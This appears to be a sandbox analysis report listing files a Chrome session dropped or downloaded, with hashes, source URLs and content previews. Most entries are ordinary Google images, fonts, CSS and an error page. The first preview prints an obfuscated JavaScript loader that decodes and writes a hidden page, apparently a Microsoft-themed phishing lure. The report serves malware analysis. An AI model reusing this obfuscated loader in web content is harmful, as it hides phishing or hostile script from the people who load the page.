                                                                                                                                                                                                                                                                                          Preview:<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*8H*76ITHY%5EUJ*75myrq*8J*5F*8Hmyrq*75qfsl*8I*77js*77*8J*5F*8Hmjfi*8J*5F*75*75*75*75*8Hrjyf*75hmfwxjy*8I*77ZYK2%3D*77*8J*5F*75*75*75*75*8Hrjyf*75sfrj*8I*77%7Bnj%7Cutwy*77*75htsyjsy*8I*77%7Cniym*8Iij%7Bnhj2%7Cniym*7H*75nsnynfq2xhfqj*8I635*77*8J*5F*75*75*75*75*8Hynyqj*8JRnhnwtx
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):624
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.522957615284972
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:t4noe350TK5+YGnHV+v9D738dU/skfvMkNIBcXTIs2W1JNuEivimuY:t4oQAGGn1+v93XskftN4cXTIsX1JFI
                                                                                                                                                                                                                                                                                          MD5:FF0B9327F742C8C9B72593D572C7258C
                                                                                                                                                                                                                                                                                          SHA1:0C86A090B503D7AB19F584BDDCEEFD8D0DC2F508
                                                                                                                                                                                                                                                                                          SHA-256:2DDA47A6B513FC3E6ACF6FDA6334495C16A00DF9639854C23E10562B06FF2917
                                                                                                                                                                                                                                                                                          SHA-512:1830B6B85C6413CE2F9C9529BDDBC76C942532D7A660B14B0A09E63DB6883FD42D06E9024F8F29629C1AF97E859D347095E218E253F74816658DFC33426B8D30
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" height="24px" viewBox="0 -960 960 960" width="24px" fill="#000000"><path d="M560-80q-56 0-105.5-18T364-148l-56 56q-12 12-28 12t-28-12q-12-12-12-28t12-28l56-56q-32-41-50-90.5T240-400q0-138 95.5-229T560-720h320v320q0 62-23.5 120T786-174q-48 47-106 70.5T560-80ZM220-560q0-75 52.5-127.5T400-740q-75 0-127.5-52.5T220-920q0 75-52.5 127.5T40-740q75 0 127.5 52.5T220-560Zm340 400q48 0 92-17.5t78-52.5q35-34 52.5-78t17.5-92v-240H560q-47 0-90.5 18T392-571q-35 34-53.5 78T320-400q0 39 12 74t33 65l207-207q12-12 28-12t28 12q12 12 12 28t-12 28L421-204q29 21 64.5 32.5T560-160Zm0-240Zm0 0Z"/></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3042
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.893880373562449
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:pH94yCKJQiPB5mCp++S5P0ejDduD0o8W9Ab4jcJKkQ3Ud7uxjUn82ugEZ3br4yh/:j/RrPB5zwlOvwo8Wz+Pog82+rD
                                                                                                                                                                                                                                                                                          MD5:A00F17187FA42F57B592304788AC6A30
                                                                                                                                                                                                                                                                                          SHA1:AD516D3B240E1A107572EABEB5F572F550086A28
                                                                                                                                                                                                                                                                                          SHA-256:12734F09D5293119E4C4373D3AD6B06BA282FC0199CFCC043CA6B029FA1C15B2
                                                                                                                                                                                                                                                                                          SHA-512:01AFA9F80A034C7AB612445E75F5CBE4C0F8AE4D10A94E38ACBC13442AFAA3F1D4B599BFD42332F3AC8410C20671CF059B940A720C86C6777EA3AF62D2F139AB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{..U...[...] .0(.iS.d..0....)....".yW.h@@.A)...1.DE..e!6*Y.a."o...../......z.cv....gvM....;....3s.......p8.....p8.....p8.....p8......|e.O........@.a..9..$.A..).../..j)`60.X......)o.0>..<....L...........W..".....x....<.\...|.#u.......n.f.L`.....8G.....W..a|"p^.{=..;.D.\t........|~hK.4C.^F.D4q/p....2u4.8.g.7..).x]..v#..p.[..GW.t.....&.S.e.a..=H....:..81.J.w]UV.s..J...q........Z7.....k.i..o..q...wV.PG.D=...#N.)C.=.:.z.....jm..m.0>........e....e....#fX.e.=...8...f5.y..,)...........E.gZ.e.o[....j.OkH7p..`Q...@.._...x...e.u..ey_O.0....|D.....u{..,...j. va...8.g...n.`.al........K.@@..=.Z......I"(R|.@.w...\G,..].M.d.B.. .......0.......#(.(......|+.Qx..#....<" .......i.^.T.:.`?.xkC..............w.}....o.......G.TP..:..\..-."..i....q8a.....xIP.X..8...?.&.!....r.....|..~*..(.1SP~..?.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6518
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.94447563884122
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:ZuYRI/I8blV/47cyAsUKlvWvUvV5Vx9V03toP+KkM3yej:ZFV8xVC5AWlp7Vxz03+WKfyej
                                                                                                                                                                                                                                                                                          MD5:A7EDE04C002101CF1C448888E0553446
                                                                                                                                                                                                                                                                                          SHA1:69FA0155412054C44051B54F9B8AEE8CACF94DDB
                                                                                                                                                                                                                                                                                          SHA-256:377882BFF6C62DE6A0C2797516127771D7F5765FC5846A2D3E8BC7822EF74EC1
                                                                                                                                                                                                                                                                                          SHA-512:8FBD5EA17BF15999D55406E0177A2813D102578053A62FF58BCD9B359010A5B4AA0127854D71E783537C93A8342BD5FF7C929F8C67438D8520576559E220CB77
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i4!3i7!4i256!2m3!1e0!2sm!3i707457713!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=1582
                                                                                                                                                                                                                                                                                          Preview:RIFFn...WEBPVP8Lb.../..?.. ......Kl.no..$I9.....N.3.+..$!..........Xk..7.1...u....6...a.e.e.e.%.,.,...j........;.....J.d.J.@..D.D.B8.... .W+s>.......B;.N=D1...N... .W....-..!..v5.>-.T....n.#........;.6.hQt....9..a0.......zq.{7.~..U.6.CZ...N&.X..=...5.{'..9+h.[#$.}1-....S.-...a4..^.k.96V.p%..S!.gY.$.....&....hk..;H...S..E....v.$QY...tK.z...Z....!.=.]...\..HcL.....2.mcU.+..~.V.i..:.......H..T... ..(...G".Q%$...'NF..[.I./.>......pJ.^..`.B%....9V.l..TH};y..s......Z.E.@p..J6pw.r...z.Or/..K....r.>..g.]...)z.....>.SN....9..k-.+.|-..6.OG..sT......Y%.+..b.....h_..9............hX.w......3./.....!j.N..:t.?.`E..tU.M@I.7vO...}'1m..7$....qK\.V..=..+..P_..GZc'\F.w....!1..Xl.uU.K.{9...7.l.}^...w...$&.B.r^.p.:K.../.y...nPb].?...h.h.V..J..O...4...>.Zge...q._H....i.:.:'r.dM.*.D.m...|e...A.F..1..[X...{...V.LB1PI..R.A.!..*:@..iW...|..d~egU..N...R....J.i-..4.n....j..P.@jm>:%]...)1....`.".z...jh....'q.U.g6..c.....*)....dg..-.J)...StU.n...y..WO.y.;(...%..^
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x394, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):57236
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.968092775053413
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:EMGWRnbTrm+idRZ5FWHiA4okPVI5/dEbaHb+aHeU:Xn/rm+i55FWHiAFkdbvap
                                                                                                                                                                                                                                                                                          MD5:3FDA09CC82C3444298FCF241FDAF153B
                                                                                                                                                                                                                                                                                          SHA1:34F3353EAD1C4DC6696B1C9AED7DF9A8ACF2099E
                                                                                                                                                                                                                                                                                          SHA-256:918040FA2AC6F7DB7B8A54DFCBDACA5D0A192179A3C40079374EDC8CB1685BBE
                                                                                                                                                                                                                                                                                          SHA-512:10DDD1D31959CF4104A242B704C44048BCD72BBD534C86020676F7F6485B1AC2D7FD00082E743DCCDD885DC6A42DB0E1EB86F69865BAAC9D60718B1BD1120138
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/a6/75/2c121790406784c2897521883be5/recykal-google-sustainability-image-900x506-pix-02.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................O.........................!1.AQ.."aq.2....#B....R..3br$...CSs....c.D...%45dt....................................:........................!.1A.Q."aq.2......#B.Rr..3.$Cb..............?...w.r`..CR..B.....4#.....r....2.\..9..a.4P.E..k,..xum...........I.9.......n(3........r....S...+...KL.J.'....p.R3........S........h.S..Z...T..^..z..I.')....#.+.NejOZ).2.z.p~.......].ut....).......S.;..Z.....o.H.o..n.NY..G#..m@.U.....ZAZP.1a.EN....mS....]........f./..T.T"..G....YTxO>.^)Z..j...:1..B..c...^.$...kBkUJ..-....j.*K....y-..A>"9.u..~.X.......s;k...9dk'....E. $..[k.,.i.BD&t....c. .....?Z....NX1.=..nPZp..).^~...a....f...1.....8..K..gM&.ln..A..EO......Vp....]...<.......L.....c.<.*.....e.o.*<.|.P..$.....Ey...mg..to...a....w,D.cCJ]....c)...=....e:...........#Et..[.54..H..O.h.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 75752, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):75752
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996594158414114
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:lc/JHZajcaKIMGuyehKLOGSzLKw5oBfNNH4f0LfNd03fGslOP4UMslt:eB5X4uJh2OGULHuBfNNYAVdCesm4UpX
                                                                                                                                                                                                                                                                                          MD5:CED0D4AD1BCD0464FC4DF3D1DE402441
                                                                                                                                                                                                                                                                                          SHA1:F1E46E8B76222B53C16821CFF9EA2AF57D6B31DC
                                                                                                                                                                                                                                                                                          SHA-256:855FCBD7AF49663D5655A881269E234B6F9A9CC9091D01FD75A8891E10D1494D
                                                                                                                                                                                                                                                                                          SHA-512:04C6E07E4BB398189AB1D1123638767D0A019EEA338C3AA9A4B2D5927F2377C5B1ED85DB541CFEF0A65BAD9ADABFBD0DB79A272ABC433873F4F985E9F0099C8C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......'..........'u..........................'......F?HVAR...`?STAT..'...B/<.....t..'..D.0..j.6.$.... ..B.....[.....bl..T..l..0.;m.......1l.z.$.Y.Zv.^@o........7S......'.9,..%mAk.3...f.T...lm..S...!.l..6..e....'.4.B....Q{.........E...0.Y2N.".z2I.J0..M.1.....D..TX..S....%...0...`\.GQ6S....zT.`..{8..#)=C>]qp.......+23...Y..q.\..z.E..@1...W]...@.....!....7..5.O...L.<.^8Q.T.&/...2v.82k3.......F.?Y......._.j.........._.o.b.W....v.u.).y,....Gw..oc#.|.....Kz.qE............(.M..S,[............o?.b...M....m...I.$IHN..I.$I...m.&Ir...$.$''I.s.srr..s.IZ.....$U..v...= ......<.$[.G.o.l..?4g.....<...TD<.8.n.:..../...e.....w..j..V...#2.TZZ$.6...(.D...V...bG.O.........1EH.CF.[$).IJLd....'.w......s......!.....DZ!GB.._.....g.}.^.Tkw..D...*,\..42..r.._k3$.e,n.f....]...x.C..y.z..IA6q$.,"..........7.9....9 ).P@.Xz[L1.;3)...-......F..4.aI..4..9+b.1..Z......0...u>~^..g'...Sy[;...~x@.e[..EI.8.|.a.....tO.m.[.AG@..|..U..}#^..Z.-p...d2...L7s.%..@........m............IvY>....3
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):34272
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.549754109739091
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:V+yiCvwvdvmv0vcvVvOYKZ7EUi41uaDDWQOZvkEVHb0Ez9u:V+yiL
                                                                                                                                                                                                                                                                                          MD5:9A440B5FF83511F7B4E1B33F077A430C
                                                                                                                                                                                                                                                                                          SHA1:CC0FF94531A57DA03010E4360848A13226678A01
                                                                                                                                                                                                                                                                                          SHA-256:AADB3BF2A63C887D5A4C48E46CA390939BD5E90430FCCB991473F2E8C268AA13
                                                                                                                                                                                                                                                                                          SHA-512:4A8990E5528D3A88A11F0DE61703453BD8CA04A8550AC2EF83D85CE9C9EA1A80E6C52926FE62BD3906F85DF2FC89C526AAED57F6626DBD952D9B7974DBDF0607
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700|Google+Sans+Display:400|Google+Sans:400,500|Product+Sans:400&lang=en&display=swap"
                                                                                                                                                                                                                                                                                          Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.g
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1166
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):532
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.546915802300472
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XK2BXz19VAfl99dLqOcdM3DSB4pE4f2pUS89i0GrOT7TYoeZzP6xgtdEk+FuC:XKiZ2lfQOcdKE40L89i91NYiakw
                                                                                                                                                                                                                                                                                          MD5:EA542C39DC64FEC3C004092C1138DF0F
                                                                                                                                                                                                                                                                                          SHA1:BE993F65EBBE7283FB1DDD32D0D377D9D8FBC370
                                                                                                                                                                                                                                                                                          SHA-256:586617CC43D5241F7B53AFC0663759492D454620B47ADA0094067F6743162839
                                                                                                                                                                                                                                                                                          SHA-512:10343396B63A88C5F5B4D2548A1BD4A86D3B5999167DF8084C37D1E4214E60AAFB657B92DEC1D05C0AD794FB9A3B95F28E847715916324BFD15877AFF65FF041
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........TQo.0.~.y/....-%.Pi.ZMj....%"...b#....0.e].f.}w..... z8.*8p..%c.......,b......Cr.5..Z...}..H..(.j.N;..~S.x...........0..IiL.t.m..w....y.....c%...#[,..EIr.8./..3.\.F.%...d%.....!.g..P."6.......P:..a*..l..r..z...A.......&K.5O......8.k.....d.6.......D*y..X=..F....W...\.<..g.xN..<SX...a=.Ne...&V.0.k.......h........j..t..x.~.....{...D<E{F....`.?.3.O.3A.S......H...}....5.U.Q(i/v....".Fa..JH..<..f....K...6..>.V.y.g....0.......z..`....A....x.gw..p\z.8..{.U..x.}+..o...3...]..2.a8)V.._@................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):14116
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65552037622446
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:xkV/Jtv95PDg1g0Sx3Leu4UX644Y48TeJKCR3jIL3n4Z:xkV/JtvPca0Sxbeu4UX644Y46KKCR3Au
                                                                                                                                                                                                                                                                                          MD5:AD4439B83B65F1CA4CD6C81178DBC6A5
                                                                                                                                                                                                                                                                                          SHA1:F505AF59D6CD81DA9C153622F7F09ABE812073B6
                                                                                                                                                                                                                                                                                          SHA-256:254A7C313076C3CBD2A21E78C9C9762DBEDFF5F3D21CAC6090A8C4F67334E942
                                                                                                                                                                                                                                                                                          SHA-512:690AC84ED5CC5C3BB34CA3207401E601CD065CE8725AC5A50219962108F15BE64CAA09C8D2D07ECD159B2A32330F27A6061FA18027379D574200B9813AC68D2C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://about.google/assets-products/img/glue-icons.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg">. <defs>. <svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg>. <svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg>. <svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41L20 15l-8-8-8 8 1.41 1.41L12 9.83"></path></svg>. <svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>. <svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>. <svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"></path></svg>. <svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"></path></svg>. <svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 240x240, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):10176
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.982018441057502
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:oq0moJUV7UzrRoVS/1wkcF7Ptg3DrsP2szge7GtPnq5meXnvqatm:o3fUWzWVSKp12szge7GxnSm5
                                                                                                                                                                                                                                                                                          MD5:97CC8E86C2752835CEFBF9A1BFA03252
                                                                                                                                                                                                                                                                                          SHA1:BD087F67E577165F9470A25ECCDABC4A17EFBE6B
                                                                                                                                                                                                                                                                                          SHA-256:DA26729FFD4122E2B4CBC3C764621DCBC9791C7D51CD3EDBF277DDBD14116078
                                                                                                                                                                                                                                                                                          SHA-512:B172DD8FF5387BBD2629BFE0DA9947151B52362148B6B5557653D39D40021633BB9C167ADA375ADC9C233CEE40C6E9F62706A535216009341A32AB8948CA6EA8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/-l2uCHxepneGNmf6MyjbK_YHkf7i3lgbrUWvNJL8CQInmOWrMChhC9vcKs27pJqtERrM7t14UCh0rPVcKg3rHBl2hAV3pUwCrgSP=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF.'..WEBPVP8 .'......*....>U$.F#..!%..`p..cl.s....Q.......WrO../....k....{.....zl....'.7.7h....xO...*e..mK>q....{x...R....s..?,.8.#.........z_~..3~.. ..@N$..}1<..s.......3&.....p_..k_q..h/p..e.%Br..3.e.K4.........^..p..c...l.)x.N..a%....j.2.VF.l...?{...Kt.X....)s..V.@=...M.U^.\Yf!xn.'/N....U<.#.wC+..|`..*.pz.B[dJ.T..9.'..YB"M..5.Y..........K.J.......Z.A.#...._..............#o4..Qj.|..Yr.R.yF.....M..L..y>Hb.&j...q!'k.....C....:......k....4&....Z..Q..f&/...[)...F.g0...I..(...P...M....:..(.....C~h.=o,z$?.Q?............x.j..o..Y.9..~..Q..{.~..C...3.T..J.p|...c.4.OTX3z.G.'-.4&...:..&aq..|../LW4..mp.O.#.....',y.....RzQ.%.|V.:.Bq>n.F.F....F..@.z.>Fb`:.........`Uq.LD.....6...-...^..>nv...z...I.G..f.".jK.W..".#?B...'..U.o..MEA...r.kq.,.b....R.......c...<?(.Ez,.q.d\.l../..s.....t.\.>.{..bt.../..X\j9.h.v.....$.7.y..=p...1.uM?.YC.6.Q..g....E.V@.N.5'"..c5b.....Z.@.F..^..*cF.Y. ..6-.K.A.....Q..T...L.l...V..}.!..@J.......a......J..92Y....?x+.!.x.$...)
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1555
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.249530958699059
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
                                                                                                                                                                                                                                                                                          MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                                                                                                                                                                                                                                                          SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                                                                                                                                                                                                                                                          SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                                                                                                                                                                                                                                                          SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 850
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.458146194716828
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XMJM6MpcEMkBA0AMs6Q0hpqczjvllR8xvdorh:XGMzpakGwQAtzTllGHorh
                                                                                                                                                                                                                                                                                          MD5:EDCDBEDB52C2E68C3F063DDD6BCEFB7D
                                                                                                                                                                                                                                                                                          SHA1:56A0293C08B4974D6218E3C7ED34F62C4AA82539
                                                                                                                                                                                                                                                                                          SHA-256:C050AFC09DC3B20A168F7BD37123F1C6FFBF2618E3083ABBF1903B07B8FB9429
                                                                                                                                                                                                                                                                                          SHA-512:1EA1D477BA76406400B3BD09D3979BF07F2ED10024C195DACD1524CB864B6AADE07130A936FAE35E60B12490C0F7066B34E6BF7F2359E460F4DF60E0075FD4F3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/youtube_play_default.svg
                                                                                                                                                                                                                                                                                          Preview:.............n.0.E..P.)Q.c.g1.R.u. ."6._?...]L..q!...q7<......*........U..1C....*f....uhU?....f.&3....C.F.....u..U...'.9EH&..2.;h.R..9M.s.0H..E..Xo3.ORf...u4Xz....5!b.1zMh....U...>D...v...6.6. .(&.E.,.mY.....d.8......Y...=.....S.Y.T..$...de1..9_b...5..,.......(.g.,.r..D[H..'J.H....A....m_pX).'.u.(.g...[?..-...L...U...G.Po...-.)....l..'t@..|F.x....a..9*.bM.?h..t..U/].)...../.R.~W..........d.R.R...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
